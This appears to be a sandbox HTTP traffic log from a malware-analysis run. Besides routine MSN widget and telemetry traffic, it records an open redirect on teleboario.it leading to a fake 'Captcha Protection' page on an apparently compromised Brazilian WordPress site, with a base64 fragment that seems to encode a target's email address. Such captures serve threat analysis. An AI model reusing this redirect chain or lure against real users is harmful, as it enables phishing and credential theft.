2025-01-09 16:24:15 UTC	16384	IN	Data Raw: 30 30 30 30 34 30 30 30 0d 0a 64 61 73 20 76 6f 6e 20 31 39 31 31 20 62 69 73 20 31 39 32 38 20 70 72 6f 64 75 7a 69 65 72 74 20 77 75 72 64 65 2e 3c 2f 70 3e 20 20 3c 70 3e 44 69 65 20 56 65 72 73 69 6f 6e 20 64 65 73 20 52 65 63 6f 72 64 73 20 75 6e 74 65 72 73 63 68 69 65 64 20 73 69 63 68 20 73 74 61 72 6b 20 76 6f 6d 20 53 74 61 6e 64 61 72 64 6d 6f 64 65 6c 6c 2c 20 6d 69 74 20 65 69 6e 65 72 20 67 65 74 75 6e 74 65 6e 20 56 65 72 73 69 6f 6e 20 64 65 73 20 39 2c 31 2d 4c 69 74 65 72 2d 52 65 69 68 65 6e 73 65 63 68 73 7a 79 6c 69 6e 64 65 72 6d 6f 74 6f 72 73 2c 20 65 69 6e 65 6d 20 73 63 68 6d 61 6c 65 6e 20 46 61 68 72 67 65 73 74 65 6c 6c 20 75 6e 64 20 65 69 6e 65 72 20 61 65 72 6f 64 79 6e 61 6d 69 73 63 68 65 6e 20 45 69 6e 73 69 74 7a 65 72 Data Ascii: 00004000das von 1911 bis 1928 produziert wurde.</p> <p>Die Version des Records unterschied sich stark vom Standardmodell, mit einer getunten Version des 9,1-Liter-Reihensechszylindermotors, einem schmalen Fahrgestell und einer aerodynamischen Einsitzer
2025-01-09 16:24:15 UTC	12	IN	Data Raw: 32 72 66 50 66 46 71 51 33 53 0d 0a Data Ascii: 2rfPfFqQ3S
2025-01-09 16:24:15 UTC	16384	IN	Data Raw: 30 30 30 30 36 30 30 30 0d 0a 41 6d 22 2c 22 73 6f 75 72 63 65 22 3a 22 6d 73 6e 22 7d 5d 7d 2c 7b 22 64 61 74 61 54 65 6d 70 6c 61 74 65 22 3a 22 34 63 32 72 2d 36 63 61 72 64 73 2d 74 32 22 2c 22 6c 61 79 6f 75 74 54 65 6d 70 6c 61 74 65 22 3a 22 34 63 32 72 2d 36 63 61 72 64 73 2d 74 32 22 2c 22 63 61 72 64 73 22 3a 5b 7b 22 69 64 22 3a 22 42 42 31 72 39 35 50 70 22 2c 22 74 79 70 65 22 3a 22 61 72 74 69 63 6c 65 22 2c 22 74 69 74 6c 65 22 3a 22 c3 84 72 67 65 72 20 77 65 67 65 6e 20 50 72 6f 67 72 61 6d 6d 2d c3 84 6e 64 65 72 75 6e 67 20 69 6e 20 41 64 65 6c 62 6f 64 65 6e 20 e2 80 93 20 73 6f 20 72 65 61 67 69 65 72 65 6e 20 4f 64 65 72 6d 61 74 74 20 75 6e 64 20 64 65 72 20 56 65 72 61 6e 73 74 61 6c 74 65 72 22 2c 22 61 62 73 74 72 61 63 74 22 3a Data Ascii: 00006000Am","source":"msn"}]},{"dataTemplate":"4c2r-6cards-t2","layoutTemplate":"4c2r-6cards-t2","cards":[{"id":"BB1r95Pp","type":"article","title":"rger wegen Programm-nderung in Adelboden so reagieren Odermatt und der Veranstalter","abstract":

Timestamp	Bytes transferred	Direction	Data
2025-01-09 16:24:16 UTC	304	OUT	GET /weathermapdata/1/static/weather/Icons/MSIAWwA=/Condition/WindyV2.png HTTP/1.1 Accept: / Accept-Language: en-CH UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: assets.msn.com Connection: Keep-Alive
2025-01-09 16:24:16 UTC	1058	IN	HTTP/1.1 200 OK Content-Type: image/png Last-Modified: Wed, 04 Sep 2024 02:01:32 GMT ETag: 0x8DCCC857FA09122 Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0 x-ms-request-id: ab715ce1-601e-0055-67a6-fe367e000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * Expires: Thu, 06 Feb 2025 12:46:36 GMT Date: Thu, 09 Jan 2025 16:24:16 GMT Content-Length: 2322 Connection: close Alt-Svc: h3=":443"; ma=86400 Akamai-Request-BC: [a=23.38.99.171,b=497502738,c=g,n=DE_HE_FRANKFURT,o=20940] Server-Timing: clientrtt; dur=89, clienttt; dur=1, origin; dur=0, cdntime; dur=1, wpo;dur=0,1s;dur=0 Akamai-Cache-Status: Hit from child Akamai-Server-IP: 23.38.99.171 Akamai-Request-ID: 1da74a12 Cache-Control: public, max-age=2592000 Timing-Allow-Origin: * Akamai-GRN: 0.ab632617.1736439856.1da74a12 Vary: Origin
2025-01-09 16:24:16 UTC	2322	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 48 00 00 00 48 08 06 00 00 00 55 ed b3 47 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 08 bc 49 44 41 54 78 9c ed 9b 7f ac 14 57 15 c7 bf f7 de d9 dd b7 ef 15 a4 cf 5f a5 a2 90 18 6a 1a 62 c5 40 2d 06 45 04 4b 9a 26 06 b0 ad 29 56 ad d6 56 13 8d 52 4c 6a 53 89 d2 18 d3 3f 8c c6 d7 a6 fd c3 16 53 68 f4 1f 8d 01 5b 88 da 7f f8 ad 46 45 40 02 b5 14 5b fe 20 c4 b6 ef 15 1e 3f 76 77 e6 de 73 8e 7f cc cc ee cc ec 8f 2e 3c 76 59 c9 7c f3 26 77 73 e7 ce 9d b3 9f 3d e7 dc 73 67 f7 01 b9 72 e5 ca 95 2b 57 ae 5c b9 72 e5 ca 95 ab df 52 57 da 80 58 fb 5f 99 58 34 54 50 df 2a 79 66 91 67 d4 68 a9 68 46 99 05 17 6a 6e 3c 70 f4 86 1f b8 bd 96 e9 e9 45 37 5e bf bf 9f Data Ascii: PNGIHDRHHUGsRGBsBIT\|dIDATxW_jb@-EK&)VVRLjS?Sh[FE@[ ?vws.<vY\|&ws=sgr+W\rRWX_X4TP*yfghhFjn<pE7^

Timestamp	Bytes transferred	Direction	Data
2025-01-09 16:24:20 UTC	794	OUT	GET /teleboario_adv.php?variable=403&url=%2F%2Fplasticoscorrea.com.br%2Fscript%2F%23Y2xpZW50cmVsYXRpb25zQGFwcHJhaXNhbC1uYXRpb24uY29t HTTP/1.1 Host: www.teleboario.it Connection: keep-alive sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-01-09 16:24:20 UTC	334	IN	HTTP/1.1 302 Found Date: Thu, 09 Jan 2025 16:24:20 GMT Server: Apache Set-Cookie: adv_popup=true; expires=Thu, 09-Jan-2025 16:34:20 GMT; Max-Age=600; path=/ Location: //plasticoscorrea.com.br/script/#Y2xpZW50cmVsYXRpb25zQGFwcHJhaXNhbC1uYXRpb24uY29t Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Timestamp	Bytes transferred	Direction	Data
2025-01-09 16:24:22 UTC	679	OUT	GET /script/ HTTP/1.1 Host: plasticoscorrea.com.br Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-01-09 16:24:22 UTC	382	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 16:24:22 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=07b8c9df6bd992d5879b57fe687fff5b; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2025-01-09 16:24:22 UTC	6250	IN	Data Raw: 31 38 35 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 61 70 74 63 68 61 20 50 72 6f 74 65 63 74 69 6f 6e 20 2d 20 53 6c 69 64 65 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 2f 3e 0a 20 20 0a 20 20 3c 6c 69 6e 6b 0a 20 20 20 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 0a 20 20 20 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 73 65 2e 66 6f 6e 74 Data Ascii: 185d<!DOCTYPE html><html><head> <meta charset="utf-8"/> <title>Captcha Protection - Slider</title> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"/> <link rel="stylesheet" href="https://use.font

Timestamp	Bytes transferred	Direction	Data
2025-01-09 16:24:23 UTC	638	OUT	GET /script/disk/slidercaptcha.css HTTP/1.1 Host: plasticoscorrea.com.br Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24" sec-ch-ua-mobile: ?0 Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://plasticoscorrea.com.br/script/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=07b8c9df6bd992d5879b57fe687fff5b
2025-01-09 16:24:23 UTC	254	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 16:24:23 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Tue, 07 Jan 2025 16:40:09 GMT Accept-Ranges: bytes Content-Length: 3902 Vary: Accept-Encoding Content-Type: text/css
2025-01-09 16:24:23 UTC	3902	IN	Data Raw: 62 6f 64 79 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 78 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 76 68 3b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 38 66 39 66 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 75 69 2d 73 61 6e 73 2d 73 65 72 69 66 2c 20 73 79 Data Ascii: body { overflow-x: hidden; overflow-y: hidden; margin: 0; height: 100vh; display: flex; flex-direction: column; align-items: center; justify-content: center; background-color: #f8f9fa; font-family: ui-sans-serif, sy

Timestamp	Bytes transferred	Direction	Data
2025-01-09 16:24:23 UTC	631	OUT	GET /script/disk/longbow.slidercaptcha.js HTTP/1.1 Host: plasticoscorrea.com.br Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24" sec-ch-ua-mobile: ?0 Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://plasticoscorrea.com.br/script/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=07b8c9df6bd992d5879b57fe687fff5b
2025-01-09 16:24:23 UTC	269	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 16:24:23 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Tue, 07 Jan 2025 16:40:09 GMT Accept-Ranges: bytes Content-Length: 13665 Vary: Accept-Encoding Content-Type: application/javascript
2025-01-09 16:24:23 UTC	7923	IN	Data Raw: 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 27 75 73 65 20 73 74 72 69 63 74 27 3b 0a 0a 20 20 20 20 76 61 72 20 65 78 74 65 6e 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 6c 65 6e 67 74 68 20 3d 20 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 74 61 72 67 65 74 20 3d 20 61 72 67 75 6d 65 6e 74 73 5b 30 5d 20 7c 7c 20 7b 7d 3b 0a 20 20 20 20 20 20 20 20 69 66 20 28 74 79 70 65 6f 66 20 74 61 72 67 65 74 20 21 3d 20 22 6f 62 6a 65 63 74 22 20 26 26 20 74 79 70 65 6f 66 20 74 61 72 67 65 74 20 21 3d 20 22 66 75 6e 63 74 69 6f 6e 22 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 20 3d 20 7b 7d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 Data Ascii: (function () { 'use strict'; var extend = function () { var length = arguments.length; var target = arguments[0] \|\| {}; if (typeof target != "object" && typeof target != "function") { target = {}; }
2025-01-09 16:24:23 UTC	5742	IN	Data Raw: 68 61 74 2e 6f 70 74 69 6f 6e 73 2e 77 69 64 74 68 20 2b 20 27 2f 27 20 2b 20 74 68 61 74 2e 6f 70 74 69 6f 6e 73 2e 68 65 69 67 68 74 20 2b 20 27 2f 3f 69 6d 61 67 65 3d 27 20 2b 20 4d 61 74 68 2e 72 6f 75 6e 64 28 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 20 2a 20 32 30 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 69 73 49 45 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 78 68 72 20 3d 20 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 28 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 68 72 2e 6f 6e 6c 6f 61 64 65 6e 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 66 69 6c 65 20 Data Ascii: hat.options.width + '/' + that.options.height + '/?image=' + Math.round(Math.random() * 20); } if (isIE) { var xhr = new XMLHttpRequest(); xhr.onloadend = function (e) { var file

Timestamp	Bytes transferred	Direction	Data
2025-01-09 16:24:23 UTC	474	OUT	POST /OneCollector/1.0?cors=true&content-type=application%2Fx-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=c498711f02654edca8a715ca6e1cb4d4-dc31da17-845c-4cca-84e5-547d05dad708-6945&upload-time=1736439861541&w=0&anoncknm=al_app_anon&NoResponseBody=true HTTP/1.1 Accept-Encoding: gzip, deflate Content-Length: 15932 Content-Type: application/json; charset=UTF-8 Host: browser.events.data.msn.cn Connection: Keep-Alive Cache-Control: no-cache
2025-01-09 16:24:23 UTC	15932	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 53 65 72 76 65 72 4c 6f 67 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 63 34 39 38 37 31 31 66 30 32 36 35 34 65 64 63 61 38 61 37 31 35 63 61 36 65 31 63 62 34 64 34 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 39 54 31 36 3a 32 34 3a 31 31 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 64 61 74 61 22 3a 7b 22 70 61 67 65 22 3a 7b 22 70 72 6f 64 75 63 74 22 3a 22 65 6e 74 77 69 6e 64 6f 77 73 64 61 73 68 22 2c 22 61 70 70 54 79 70 65 22 3a 22 77 69 6e 57 69 64 67 65 74 73 22 2c 22 6e 61 6d 65 22 3a 22 77 69 6e 70 32 62 61 63 6b 69 6e 67 61 70 70 22 2c 22 69 73 4d 6f 63 6b 45 6e 76 22 3a 66 61 6c 73 65 2c 22 68 6f 73 74 56 65 72 22 3a 22 35 32 34 2e 33 30 35 30 32 2e 33 30 2e 30 22 2c 22 Data Ascii: {"name":"MS.News.Web.ServerLog","iKey":"o:c498711f02654edca8a715ca6e1cb4d4","time":"2025-01-09T16:24:11Z","ver":"4.0","data":{"page":{"product":"entwindowsdash","appType":"winWidgets","name":"winp2backingapp","isMockEnv":false,"hostVer":"524.30502.30.0","

Timestamp	Bytes transferred	Direction	Data
2025-01-09 16:24:24 UTC	440	OUT	GET /script/disk/longbow.slidercaptcha.js HTTP/1.1 Host: plasticoscorrea.com.br Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=07b8c9df6bd992d5879b57fe687fff5b
2025-01-09 16:24:24 UTC	269	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 16:24:24 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Tue, 07 Jan 2025 16:40:09 GMT Accept-Ranges: bytes Content-Length: 13665 Vary: Accept-Encoding Content-Type: application/javascript
2025-01-09 16:24:24 UTC	7923	IN	Data Raw: 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 27 75 73 65 20 73 74 72 69 63 74 27 3b 0a 0a 20 20 20 20 76 61 72 20 65 78 74 65 6e 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 6c 65 6e 67 74 68 20 3d 20 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 74 61 72 67 65 74 20 3d 20 61 72 67 75 6d 65 6e 74 73 5b 30 5d 20 7c 7c 20 7b 7d 3b 0a 20 20 20 20 20 20 20 20 69 66 20 28 74 79 70 65 6f 66 20 74 61 72 67 65 74 20 21 3d 20 22 6f 62 6a 65 63 74 22 20 26 26 20 74 79 70 65 6f 66 20 74 61 72 67 65 74 20 21 3d 20 22 66 75 6e 63 74 69 6f 6e 22 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 20 3d 20 7b 7d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 Data Ascii: (function () { 'use strict'; var extend = function () { var length = arguments.length; var target = arguments[0] \|\| {}; if (typeof target != "object" && typeof target != "function") { target = {}; }
2025-01-09 16:24:24 UTC	5742	IN	Data Raw: 68 61 74 2e 6f 70 74 69 6f 6e 73 2e 77 69 64 74 68 20 2b 20 27 2f 27 20 2b 20 74 68 61 74 2e 6f 70 74 69 6f 6e 73 2e 68 65 69 67 68 74 20 2b 20 27 2f 3f 69 6d 61 67 65 3d 27 20 2b 20 4d 61 74 68 2e 72 6f 75 6e 64 28 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 20 2a 20 32 30 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 69 73 49 45 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 78 68 72 20 3d 20 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 28 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 68 72 2e 6f 6e 6c 6f 61 64 65 6e 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 66 69 6c 65 20 Data Ascii: hat.options.width + '/' + that.options.height + '/?image=' + Math.round(Math.random() * 20); } if (isIE) { var xhr = new XMLHttpRequest(); xhr.onloadend = function (e) { var file

Timestamp	Bytes transferred	Direction	Data
2025-01-09 16:24:27 UTC	714	OUT	GET /script/images/Pic3.jpg HTTP/1.1 Host: plasticoscorrea.com.br Connection: keep-alive Origin: https://plasticoscorrea.com.br sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: image Referer: https://plasticoscorrea.com.br/script/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=07b8c9df6bd992d5879b57fe687fff5b
2025-01-09 16:24:27 UTC	383	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jan 2025 16:24:27 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://plasticoscorrea.com.br/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2025-01-09 16:24:27 UTC	7809	IN	Data Raw: 34 30 30 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e c3 a3 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 50 6c c3 a1 73 74 69 63 6f 73 20 43 6f 72 72 65 61 3c 2f Data Ascii: 4000<!doctype html><html lang="pt-BR"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Pgina no encontrada – Plsticos Correa</

Timestamp	Bytes transferred	Direction	Data
2025-01-09 16:24:28 UTC	714	OUT	GET /script/images/Pic2.jpg HTTP/1.1 Host: plasticoscorrea.com.br Connection: keep-alive Origin: https://plasticoscorrea.com.br sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: image Referer: https://plasticoscorrea.com.br/script/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=07b8c9df6bd992d5879b57fe687fff5b
2025-01-09 16:24:28 UTC	383	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jan 2025 16:24:28 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://plasticoscorrea.com.br/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2025-01-09 16:24:28 UTC	7809	IN	Data Raw: 34 30 30 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e c3 a3 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 50 6c c3 a1 73 74 69 63 6f 73 20 43 6f 72 72 65 61 3c 2f Data Ascii: 4000<!doctype html><html lang="pt-BR"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Pgina no encontrada – Plsticos Correa</

Timestamp	Bytes transferred	Direction	Data
2025-01-09 16:24:29 UTC	666	OUT	GET /favicon.ico HTTP/1.1 Host: plasticoscorrea.com.br Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://plasticoscorrea.com.br/script/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=07b8c9df6bd992d5879b57fe687fff5b
2025-01-09 16:24:30 UTC	373	IN	HTTP/1.1 302 Found Date: Thu, 09 Jan 2025 16:24:29 GMT Server: Apache Link: <https://plasticoscorrea.com.br/wp-json/>; rel="https://api.w.org/" X-Redirect-By: WordPress Upgrade: h2,h2c Connection: Upgrade, close Location: https://plasticoscorrea.com.br/wp-content/uploads/2024/09/cropped-icone-32x32.png Content-Length: 0 Content-Type: text/html; charset=UTF-8

Timestamp	Bytes transferred	Direction	Data
